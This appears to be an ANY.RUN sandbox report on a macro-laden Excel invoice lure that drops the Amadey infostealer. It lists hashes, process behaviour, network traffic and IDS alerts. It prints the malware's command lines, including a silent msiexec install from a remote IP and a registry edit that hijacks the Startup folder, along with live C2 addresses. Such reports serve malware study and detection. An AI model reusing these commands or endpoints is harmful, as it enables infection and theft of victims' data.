analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

71913464_Factura_FMC1130_20190424.xls

Full analysis: https://app.any.run/tasks/cfdfc3a7-0170-44d4-ba74-7c70f4ff657d
Verdict: Malicious activity
Threats:

Amadey is a formidable Windows infostealer threat, characterized by its persistence mechanisms, modular design, and ability to execute various malicious tasks.

Analysis date: April 24, 2019, 22:26:04
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
loader
exe-to-msi
trojan
amadey
ta505
Indicators:
MIME: application/vnd.ms-excel
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1251, Author: Microsoft Office, Last Saved By: 1, Name of Creating Application: Microsoft Excel, Create Time/Date: Wed Dec 19 10:42:12 2018, Last Saved Time/Date: Wed Apr 24 13:57:37 2019, Security: 0
MD5:

D33FD4D91E78F4E4CDA03703159BC37E

SHA1:

D49232D4EB98B5730C895A5F3B1DCAEED89502F0

SHA256:

F7A615EB750B37C381B3D8A563A2D2A810659094E2548FDBA95CED82FA390707

SSDEEP:

3072:tKpb8rGYrMPelwhKmFV5xtezEsgrdgNeEQSNfzAKAn8CsEwF:tKpb8rGYrMPelwhKmFV5xtuEsgrdgNHZ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Application was dropped or rewritten from another process

      • cmualrc.exe (PID: 3924)
    • Changes the Startup folder

      • REG.exe (PID: 2348)
    • Uses Microsoft Installer as loader

      • EXCEL.EXE (PID: 1160)
    • Unusual execution from Microsoft Office

      • EXCEL.EXE (PID: 1160)
    • Downloads executable files from the Internet

      • msiexec.exe (PID: 1712)
    • Downloads executable files from IP

      • msiexec.exe (PID: 1712)
    • AMADEY was detected

      • cmualrc.exe (PID: 3924)
    • Connects to CnC server

      • cmualrc.exe (PID: 3924)
  • SUSPICIOUS

    • Drop ExeToMSI Application

      • msiexec.exe (PID: 1712)
    • Creates files in the program directory

      • MSI98B4.tmp (PID: 1240)
    • Executable content was dropped or overwritten

      • msiexec.exe (PID: 1712)
      • MSI98B4.tmp (PID: 1240)
    • Starts itself from another location

      • MSI98B4.tmp (PID: 1240)
    • Uses REG.EXE to modify Windows registry

      • cmualrc.exe (PID: 3924)
  • INFO

    • Application was dropped or rewritten from another process

      • MSI98B4.tmp (PID: 1240)
    • Starts application with an unusual extension

      • msiexec.exe (PID: 1712)
    • Writes to a desktop.ini file (may be used to cloak folders)

      • msiexec.exe (PID: 1712)
    • Creates files in the user directory

      • EXCEL.EXE (PID: 1160)
    • Reads Microsoft Office registry keys

      • EXCEL.EXE (PID: 1160)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xls | Microsoft Excel sheet (78.9)

EXIF

FlashPix

Author: Microsoft Office
LastModifiedBy: 1
Software: Microsoft Excel
CreateDate: 2018:12:19 10:42:12
ModifyDate: 2019:04:24 12:57:37
Security: None
CodePage: Windows Cyrillic
Company: Microsoft Corporation
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts:
  • 4
  • OOOO
  • 2
  • 3
HeadingPairs:
  • Листы
  • 2
  • Макросы Excel 4.0
  • 2
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
39
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start excel.exe no specs msiexec.exe no specs msiexec.exe msi98b4.tmp #AMADEY cmualrc.exe reg.exe

Process information

PID
CMD
Path
Indicators
Parent process
1160"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /ddeC:\Program Files\Microsoft Office\Office14\EXCEL.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Version:
14.0.6024.1000
3868msiexec.exe STOP=1 /i http://92.38.135.134/dom2 /q ksw='%TEMP%' C:\Windows\system32\msiexec.exeEXCEL.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows® installer
Exit code:
0
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1712C:\Windows\system32\msiexec.exe /VC:\Windows\system32\msiexec.exe
services.exe
User:
SYSTEM
Company:
Microsoft Corporation
Integrity Level:
SYSTEM
Description:
Windows® installer
Version:
5.0.7600.16385 (win7_rtm.090713-1255)
1240"C:\Windows\Installer\MSI98B4.tmp"C:\Windows\Installer\MSI98B4.tmp
msiexec.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
3924c:\programdata\f64a428dfd\cmualrc.exec:\programdata\f64a428dfd\cmualrc.exe
MSI98B4.tmp
User:
admin
Integrity Level:
MEDIUM
2348REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\ProgramData\f64a428dfdC:\Windows\system32\REG.exe
cmualrc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Registry Console Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
904
Read events
836
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
1
Text files
11
Unknown types
4

Dropped files

PID
Process
Filename
Type
1160EXCEL.EXEC:\Users\admin\AppData\Local\Temp\CVR6D6B.tmp.cvr
MD5:
SHA256:
1712msiexec.exeC:\Users\admin\AppData\Local\Temp\~DF44C11054E097593B.TMP
MD5:
SHA256:
1712msiexec.exeC:\Windows\Installer\MSI97E7.tmp
MD5:
SHA256:
1712msiexec.exeC:\Windows\Installer\MSI98B4.tmp
MD5:
SHA256:
1240MSI98B4.tmpC:\ProgramData\0
MD5:
SHA256:
1240MSI98B4.tmpC:\programdata\f64a428dfd\cmualrc.exe:Zone.Identifier
MD5:
SHA256:
1712msiexec.exeC:\Config.Msi\e974c.rbs
MD5:
SHA256:
3924cmualrc.exeC:\ProgramData\0
MD5:
SHA256:
1712msiexec.exeC:\Users\admin\AppData\Local\Temp\~DFEFDA1F88E241853D.TMP
MD5:
SHA256:
1160EXCEL.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\71913464_Factura_FMC1130_20190424.xls.LNKlnk
MD5:C5C374F93B9F6E87F808373DA8832FAB
SHA256:12D94904F651126EEF4DFB28D89565BE9A883180936C6F81CB7FFC31FB848BA8
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
2
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
1712
msiexec.exe
GET
200
92.38.135.134:80
http://92.38.135.134/dom2
RU
executable
172 Kb
suspicious
3924
cmualrc.exe
POST
200
188.254.142.85:80
http://gohaiendo.com/ppk/index.php
BG
text
6 b
malicious
3924
cmualrc.exe
POST
200
188.254.142.85:80
http://gohaiendo.com/ppk/index.php
BG
text
6 b
malicious
3924
cmualrc.exe
POST
200
188.254.142.85:80
http://gohaiendo.com/ppk/index.php
BG
text
6 b
malicious
3924
cmualrc.exe
POST
200
213.6.58.250:80
http://gohaiendo.com/ppk/index.php
PS
text
6 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
1712
msiexec.exe
92.38.135.134:80
RU
suspicious
188.254.142.85:80
gohaiendo.com
Bulsatcom EAD
BG
suspicious
3924
cmualrc.exe
188.254.142.85:80
gohaiendo.com
Bulsatcom EAD
BG
suspicious
3924
cmualrc.exe
213.6.58.250:80
gohaiendo.com
Palestine Telecommunications Company (PALTEL)
PS
malicious

DNS requests

Domain
IP
Reputation
gohaiendo.com
  • 188.254.142.85
  • 89.45.19.18
  • 195.222.40.54
  • 86.101.230.109
  • 80.80.165.93
  • 89.47.94.113
  • 109.120.214.195
  • 84.54.187.24
  • 2.185.239.164
  • 89.121.244.210
  • 213.6.58.250
  • 91.104.18.219
  • 213.176.4.248
  • 89.238.207.5
  • 151.251.23.210
  • 82.208.161.228
  • 197.157.216.75
  • 109.175.7.8
  • 78.40.46.135
  • 190.158.226.15
malicious

Threats

PID
Process
Class
Message
1712
msiexec.exe
Misc activity
SUSPICIOUS [PTsecurity] Using msiexec.exe for Downloading non-MSI file
1712
msiexec.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Executable application_x-msi Download
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
3924
cmualrc.exe
A Network Trojan was detected
MALWARE [PTsecurity] Trojan.Win32.Amadey
5 ETPRO signatures available at the full report
No debug info